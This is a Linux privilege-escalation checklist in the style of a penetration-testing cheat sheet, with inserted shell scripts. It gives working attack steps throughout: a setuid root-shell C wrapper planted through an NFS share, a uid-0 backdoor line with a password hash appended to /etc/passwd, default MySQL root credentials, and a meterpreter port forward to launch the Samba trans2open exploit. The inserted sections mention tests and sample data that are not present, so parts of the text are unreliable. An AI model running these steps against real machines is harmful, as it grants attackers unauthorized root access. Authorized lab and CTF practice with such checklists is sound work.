Linux Privilege escalation checklist
You have a low priv shell, now what?
python -c 'import pty; pty.spawn("/bin/bash")'
OR
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200
What can we do? who are we?
What binaries do we have on the machine?
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat
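The TTY upgrade above and the `which` checks below are the same question asked twice: what interpreters are on the box, and which of them can give us a real PTY. The following script is an added example, not part of the original checklist; it inventories the binaries listed above and picks the first available PTY spawner, falling back to util-linux `script` when neither python is installed (an assumption about the target: any of the three may be missing, in which case it prints nothing and returns 1).

```shell
#!/bin/sh
# Added example (not from the original checklist): inventory useful binaries
# and choose a working command to upgrade a dumb shell to a full PTY.

# have NAME -> 0 if NAME is executable somewhere on PATH, 1 otherwise.
have() { command -v "$1" >/dev/null 2>&1; }

# inventory -> "name<TAB>path" for every checklist binary that is present.
inventory() {
    for b in gcc cc python python3 perl wget curl fetch nc ncat nc.traditional socat; do
        if have "$b"; then
            printf '%s\t%s\n' "$b" "$(command -v "$b")"
        fi
    done
}

# pty_spawn_cmd -> the command that gives a proper PTY, preferring python3,
# then python, then util-linux 'script'. Prints nothing and returns 1 when
# none of them exists (assumption: targets may lack all three).
pty_spawn_cmd() {
    if have python3; then
        printf '%s\n' "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif have python; then
        printf '%s\n' "python -c 'import pty; pty.spawn(\"/bin/bash\")'"
    elif have script; then
        printf '%s\n' "script -qc /bin/bash /dev/null"
    else
        return 1
    fi
}

inventory
pty_spawn_cmd || true
```

After running the printed spawn command, continue with the Ctrl+Z / `stty raw -echo; fg; reset` sequence from the checklist; the `script` fallback needs it just as much as the python one.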
What Arch?
file /bin/bash
Kernel?
uname -a
Issue/Release?
cat /etc/issue
cat /etc/*-release
Are we a real user?
sudo -l
ls -lsaht /etc/sudoers
Are any users a member of exotic groups?
groups <user>
Check out your shell’s environment variables…
env
Linux Privilege Escalation using PATH Variable
Users?
cd /home/
ls -lsaht
Web Configs containing credentials?
cd /var/www/html/
ls -lsaht
SUID Binaries?
find / -perm -u=s -type f 2>/dev/null
SGID Binaries?
find / -perm -g=s -type f 2>/dev/null
SUID/SGID/SUDO Privilege Escalation: GTFOBins
Binaries/interpreters with file capabilities (an entry ending in "=ep" or "+ep" means the capability is in the file's Effective and Permitted sets, so it applies as soon as the binary runs; cap_setuid, cap_dac_override and cap_sys_admin on an interpreter are as good as SUID): GetCap and SetCap - File Capabilities
getcap -r / 2>/dev/null
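An added example (not from the original checklist) that wraps the SUID, SGID and capability checks above into functions: the two `find` wrappers take a root directory so they can be pointed at a single mount, and `flag_caps` reads `getcap -r /` output from stdin and keeps only the lines carrying a capability that hands over root directly. Both getcap output formats (`path = cap_x+ep` and `path cap_x=ep`) are handled because the match is on the capability name.

```shell
#!/bin/sh
# Added example: enumerate setuid/setgid files under a root and flag
# dangerous file capabilities in 'getcap -r /' output.

# find_setuid ROOT -> regular files with the setuid bit (mode 4000) under ROOT.
find_setuid() { find "$1" -perm -4000 -type f 2>/dev/null; }

# find_setgid ROOT -> regular files with the setgid bit (mode 2000) under ROOT.
# -type f skips setgid directories, which are normal and uninteresting here.
find_setgid() { find "$1" -perm -2000 -type f 2>/dev/null; }

# flag_caps: filter getcap output on stdin down to capabilities that yield
# root (or arbitrary file access) on their own. Sample line formats:
#   /usr/bin/python3 cap_setuid=ep        (libcap >= 2.41)
#   /usr/bin/python3 = cap_setuid+ep      (older libcap)
flag_caps() {
    grep -E 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module|chown|fowner)'
}

# Usage: sh enum.sh /          -> scan the whole filesystem
#        getcap -r / 2>/dev/null | flag_caps
if [ $# -gt 0 ]; then
    find_setuid "$1"
    find_setgid "$1"
fi
```

cap_net_raw on ping or cap_net_bind_service on a web server are expected and are deliberately not flagged; what matters is an interpreter (python, perl, node) or a general-purpose tool carrying one of the listed capabilities.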
It's good to monitor the system (cron jobs, other users' processes) while performing our enumeration...
cd /var/tmp/
File Transfer --> pspy32
File Transfer --> pspy64
chmod 755 pspy32 pspy64
./pspy<32/64>
What does the local network look like?
netstat -antup
netstat -tunlp
Is anything vulnerable running as root?
ps aux |grep -i 'root' --color=auto
MYSQL Credentials? Root Unauthorized Access?
mysql -uroot -p
Enter Password:
root : root
root : toor
root :
Check whether any non-root user has left things behind in /etc/:
cd /etc/
ls -lsaht
Anything owned by someone other than root here?
Any config files left behind?
ls -lsaht |grep -i '\.conf' --color=auto
Any .secret files in /etc/ (worth checking if an information disclosure gives us root-level read access)?
ls -lsaht |grep -i '\.secret' --color=auto
Any SSH keys that can be used?
ls -lsaR /home/
Quick look in:
ls -lsaht /var/lib/
ls -lsaht /var/db/
Quick look in:
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
File Transfer Capability? What can I use to transfer files?
which wget
which curl
which nc
which fetch (BSD)
ls -lsaht /bin/ |grep -i 'ftp' --color=auto
NFS? Can we exploit weak NFS Permissions?
cat /etc/exports
Is any share exported with no_root_squash? If so, root on the attacking machine is still root on the share, so we can plant a root-owned setuid binary there.
[On Attacking Machine, as root]
mkdir -p /mnt/nfs/
mount -t nfs -o vers=<2,3,4>,nolock $IP:<NFS Share> /mnt/nfs/
gcc suid.c -o suid
cp suid /mnt/nfs/
chmod u+s /mnt/nfs/suid
su <user id matching target machine's user-level privilege.>
[On Target Machine]
user@host$ ./suid
#
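An added example (not from the original checklist) for the NFS step: `nfs_no_root_squash` parses an exports file and prints only the shares that disable root squashing, and `write_suid_c` writes the small setuid wrapper the checklist compiles as suid.c. The checklist never shows suid.c, so its contents here (setuid/setgid to 0, then `/bin/bash -p`) are an assumption about the usual minimal version; the sample exports in the test are constructed.

```shell
#!/bin/sh
# Added example: find NFS exports with no_root_squash and write the
# setuid helper source the checklist compiles as suid.c.

# nfs_no_root_squash FILE -> "SHARE CLIENT(OPTIONS)" for every export whose
# option list contains no_root_squash. Comment and blank lines are skipped.
nfs_no_root_squash() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | while read -r share rest; do
        case "$rest" in
            *no_root_squash*) printf '%s %s\n' "$share" "$rest" ;;
        esac
    done
}

# write_suid_c DEST -> write the setuid wrapper source. Assumption: the
# original page does not show suid.c; this is the minimal form of it.
write_suid_c() {
    cat > "$1" <<'EOF'
#include <stdlib.h>
#include <unistd.h>
/* With the setuid bit set and root as owner, this drops into a root shell.
   -p keeps bash from dropping the effective uid back to the real uid. */
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
    return 0;
}
EOF
}

# nfs_plant_suid IP SHARE -> the attacking-machine side of the checklist.
# Must run as root on the attacker so the copied file is root-owned on the
# server. Not called automatically; invoke it by hand.
nfs_plant_suid() {
    mkdir -p /mnt/nfs/
    mount -t nfs -o vers=3,nolock "$1:$2" /mnt/nfs/ || return 1
    write_suid_c /tmp/suid.c
    gcc /tmp/suid.c -o /mnt/nfs/suid || return 1
    chmod 4755 /mnt/nfs/suid
    ls -l /mnt/nfs/suid
}

if [ -r /etc/exports ]; then
    nfs_no_root_squash /etc/exports
fi
```

On the target, the low-privileged user then runs `/<mountpoint>/suid` from wherever the share is mounted; if the share is mounted `nosuid` on the target the bit is ignored, which is the first thing to check when the shell does not come back as root.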
Where can I live on this machine? Where can I read, write and execute files?
- /var/tmp/
- /tmp/
- /dev/shm/
Any exotic file system mounts/extended attributes?
cat /etc/fstab
Forwarding out a weak service for root priv (with meterpreter): if a vulnerable service is bound only to the loopback adaptor (127.0.0.1) on the target, get a meterpreter session, forward that port back to a listener on the attacking machine, and run the exploit locally against the forwarded port. Example: an out-of-date Samba smbd (2.2.x) listening on 127.0.0.1:139 can be hit with trans2open this way.
Port Forwarding with Meterpreter
Forwarding out netbios-ssn EXAMPLE:
meterpreter> portfwd add -l 139 -p 139 -r 127.0.0.1
(the connection is made from the compromised host, so -r 127.0.0.1 is the target's own loopback; -l is the port opened on the attacking machine)
meterpreter> background
use exploit/linux/samba/trans2open
set RHOSTS 127.0.0.1
set RPORT 139
run
Can we write to /etc/passwd as a low-privileged user? If so, add a uid-0 user with a password hash in the password field (openssl passwd -1 produces an MD5-crypt hash, which crypt() still accepts on Linux):
openssl passwd -1
i<3hacking
$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id
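An added example (not from the original checklist) covering both sides of the /etc/passwd trick: `passwd_writable` is the precondition check, and `uid0_accounts` / `passwd_inline_hashes` are the checks a defender (or a second attacker) would run to spot the backdoor line, since a second uid-0 entry with its hash stored in passwd rather than shadow is exactly what the `echo ... >> /etc/passwd` step leaves behind. The passwd contents in the test are constructed from the checklist's own siren line.

```shell
#!/bin/sh
# Added example: precondition check for the /etc/passwd backdoor and the
# two fingerprints it leaves (extra uid-0 accounts, inline password hashes).

# passwd_writable FILE -> 0 if the current user can write FILE.
passwd_writable() { [ -w "$1" ]; }

# uid0_accounts FILE -> usernames whose uid field (3rd) is 0, one per line.
# Anything besides "root" here is either a deliberate alias or a backdoor.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# passwd_inline_hashes FILE -> usernames whose password field holds a real
# hash instead of the x/*/! placeholder that defers to /etc/shadow.
passwd_inline_hashes() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "" { print $1 }' "$1"
}

# backdoor_line USER HASH -> the line the checklist appends (uid 0, gid 0).
backdoor_line() {
    printf '%s:%s:0:0:%s:/home/%s:/bin/bash\n' "$1" "$2" "$1" "$1"
}

if [ -r /etc/passwd ]; then
    if passwd_writable /etc/passwd; then echo "/etc/passwd is writable"; fi
    echo "uid 0 accounts: $(uid0_accounts /etc/passwd | tr '\n' ' ')"
    echo "inline hashes: $(passwd_inline_hashes /etc/passwd | tr '\n' ' ')"
fi
```

Generate the hash with `openssl passwd -1` as the checklist shows and pass it to `backdoor_line`; the `/home/siren` directory does not need to exist for `su` to succeed, bash just complains about it.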
Cron.
crontab -u root -l (only succeeds if we are root or sudo allows crontab; otherwise rely on the system-wide files below)
Look for unusual system-wide cron jobs:
cat /etc/crontab
ls /etc/cron.*
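What we actually want from the cron files is a job running as root whose script we can modify. The following is an added example, not part of the original checklist: `cron_targets` pulls the program path out of each job line (system crontab lines with a user field and per-user lines without one are both handled by taking the first field that starts with `/`), and `cron_writable_targets` keeps the ones that are world-writable. The crontab and scripts in the test are constructed.

```shell
#!/bin/sh
# Added example: find cron jobs whose script or binary is world-writable.

# cron_targets FILE -> for each job line, the first token that is an
# absolute path (the program being run). Comments, blank lines and
# VAR=value lines are skipped.
cron_targets() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | awk '
        /^ *[A-Za-z_][A-Za-z0-9_]*=/ { next }
        { for (i = 1; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }'
}

# cron_writable_targets FILE -> targets that exist and are world-writable
# (mode bit o+w). "-prune" keeps find from descending if the target is a dir.
cron_writable_targets() {
    cron_targets "$1" | while read -r p; do
        if [ -e "$p" ] && [ -n "$(find "$p" -prune -perm -002 2>/dev/null)" ]; then
            printf '%s\n' "$p"
        fi
    done
}

# Run over the system-wide files the checklist lists.
for f in /etc/crontab /etc/cron.d/*; do
    if [ -r "$f" ]; then
        cron_writable_targets "$f"
    fi
done
```

A target that does not exist yet but sits in a directory we can write to is just as useful; check `[ -w "$(dirname "$p")" ]` for those by hand, and pair this with pspy to catch jobs that never appear in a file.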
Bob is a user on this machine. What is every single file he has ever created?
find / -user bob 2>/dev/null
Any mail? mbox in User $HOME directory?
cd /var/mail/
ls -lsaht
LinPEAS:
LinPEAS on GitHub
Traitor:
Traitor on GitHub
GTFOBins: GTFOBins Website
pspy32/pspy64:
pspy on GitHub
credits: s1ren